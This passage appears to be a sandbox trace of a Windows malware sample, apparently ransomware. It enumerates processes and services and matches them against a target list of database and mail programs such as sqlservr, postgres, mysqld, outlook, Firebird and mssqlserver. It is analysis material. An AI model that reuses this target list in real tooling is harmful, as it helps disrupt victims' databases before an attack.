lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0243.365] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0243.365] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0243.365] lstrlenW (lpString="lsm.exe") returned 7 [0243.365] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0243.365] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0243.365] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0243.365] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0243.365] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0243.365] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0243.365] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0243.365] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.365] lstrlenW (lpString="svchost.exe") returned 11 [0243.366] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0243.366] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.366] lstrlenW (lpString="svchost.exe") returned 11 [0243.366] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0243.366] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0243.366] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.367] lstrlenW (lpString="svchost.exe") returned 11 [0243.367] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0243.367] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0243.367] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0243.367] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0243.367] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0243.367] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0243.367] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0243.367] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0243.367] lstrlenW (lpString="LogonUI.exe") returned 11 [0243.367] lstrcmpiW (lpString1="1c8.exe", lpString2="LogonUI.exe") returned -1 [0243.367] lstrcmpiW (lpString1="1cv77.exe", lpString2="LogonUI.exe") returned -1 [0243.367] lstrcmpiW (lpString1="outlook.exe", lpString2="LogonUI.exe") returned 1 [0243.367] lstrcmpiW (lpString1="postgres.exe", lpString2="LogonUI.exe") returned 1 [0243.367] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="LogonUI.exe") returned 1 [0243.367] lstrcmpiW (lpString1="mysqld.exe", lpString2="LogonUI.exe") returned 1 [0243.367] lstrcmpiW (lpString1="sqlservr.exe", lpString2="LogonUI.exe") returned 1 [0243.367] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.368] lstrlenW (lpString="svchost.exe") returned 11 [0243.368] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0243.368] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.368] lstrlenW (lpString="svchost.exe") returned 11 [0243.368] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0243.368] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0243.368] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.369] lstrlenW (lpString="audiodg.exe") returned 11 [0243.369] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.369] lstrlenW (lpString="svchost.exe") returned 11 [0243.369] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.369] lstrlenW (lpString="svchost.exe") returned 11 [0243.369] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0243.369] lstrlenW (lpString="userinit.exe") returned 12 [0243.370] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.370] lstrlenW (lpString="dwm.exe") returned 7 [0243.370] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.370] lstrlenW (lpString="explorer.exe") returned 12 [0243.370] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.370] lstrlenW (lpString="spoolsv.exe") returned 11 [0243.370] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.371] lstrlenW (lpString="taskhost.exe") returned 12 [0243.371] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.371] lstrlenW (lpString="svchost.exe") returned 11 [0243.371] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0243.371] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0243.371] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0243.371] lstrlenW (lpString="reader_sl.exe") returned 13 [0243.372] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0243.372] lstrlenW (lpString="cmd.exe") returned 7 [0243.372] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0243.372] lstrlenW (lpString="conhost.exe") returned 11 [0243.372] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0243.372] CloseHandle (hObject=0x380) returned 1 [0243.372] Sleep (dwMilliseconds=0x1f4) [0244.567] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea0b0 [0244.684] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0244.685] GetLastError () returned 0xea [0244.685] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc9a) returned 0x3dee5b0 [0244.686] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xc9a, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0244.686] CloseServiceHandle (hSCObject=0x47ea0b0) returned 1 [0245.024] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0245.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0245.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0245.024] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0245.024] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0245.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0245.024] lstrlenW (lpString="AudioSrv") returned 8 [0245.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0245.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0245.025] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0245.025] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0245.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0245.025] lstrlenW (lpString="BFE") returned 3 [0245.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0245.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0245.025] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0245.025] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0245.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0245.025] lstrlenW (lpString="CryptSvc") returned 8 [0245.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0245.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0245.025] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0245.025] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0245.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0245.025] lstrlenW (lpString="CscService") returned 10 [0245.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0245.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0245.025] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0245.025] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0245.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0245.025] lstrlenW (lpString="DcomLaunch") returned 10 [0245.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0245.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0245.025] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0245.025] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0245.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0245.025] lstrlenW (lpString="Dhcp") returned 4 [0245.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0245.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0245.026] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0245.026] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0245.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0245.026] lstrlenW (lpString="Dnscache") returned 8 [0245.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0245.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0245.026] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0245.026] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0245.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0245.026] lstrlenW (lpString="DPS") returned 3 [0245.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0245.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0245.026] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0245.026] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0245.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0245.026] lstrlenW (lpString="eventlog") returned 8 [0245.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0245.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0245.026] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0245.026] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0245.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0245.026] lstrlenW (lpString="EventSystem") returned 11 [0245.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0245.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0245.026] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0245.026] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0245.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0245.026] lstrlenW (lpString="gpsvc") returned 5 [0245.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0245.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0245.026] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0245.027] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0245.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0245.027] lstrlenW (lpString="LanmanWorkstation") returned 17 [0245.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0245.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0245.027] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0245.027] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0245.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0245.027] lstrlenW (lpString="lmhosts") returned 7 [0245.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0245.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0245.027] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0245.027] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0245.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0245.027] lstrlenW (lpString="MMCSS") returned 5 [0245.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0245.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0245.027] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0245.027] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0245.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0245.027] lstrlenW (lpString="MpsSvc") returned 6 [0245.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0245.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0245.027] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0245.027] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0245.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0245.027] lstrlenW (lpString="NlaSvc") returned 6 [0245.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0245.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0245.027] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0245.027] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0245.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0245.028] lstrlenW (lpString="nsi") returned 3 [0245.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0245.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0245.028] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0245.028] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0245.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0245.028] lstrlenW (lpString="PcaSvc") returned 6 [0245.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0245.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0245.028] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0245.028] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0245.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0245.028] lstrlenW (lpString="PlugPlay") returned 8 [0245.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0245.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0245.028] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0245.028] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0245.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0245.028] lstrlenW (lpString="Power") returned 5 [0245.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0245.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0245.028] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0245.028] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0245.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0245.028] lstrlenW (lpString="ProfSvc") returned 7 [0245.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0245.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0245.028] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0245.028] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0245.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0245.028] lstrlenW (lpString="RpcEptMapper") returned 12 [0245.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0245.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0245.029] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0245.029] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0245.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0245.029] lstrlenW (lpString="RpcSs") returned 5 [0245.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0245.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0245.029] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0245.029] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0245.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0245.029] lstrlenW (lpString="SamSs") returned 5 [0245.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0245.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0245.029] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0245.029] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0245.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0245.029] lstrlenW (lpString="Schedule") returned 8 [0245.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0245.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0245.029] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0245.029] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0245.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0245.029] lstrlenW (lpString="SENS") returned 4 [0245.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0245.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0245.029] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0245.029] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0245.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0245.029] lstrlenW (lpString="ShellHWDetection") returned 16 [0245.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0245.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0245.030] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0245.030] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0245.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0245.030] lstrlenW (lpString="Spooler") returned 7 [0245.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0245.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0245.030] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0245.030] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0245.030] lstrcmpiW 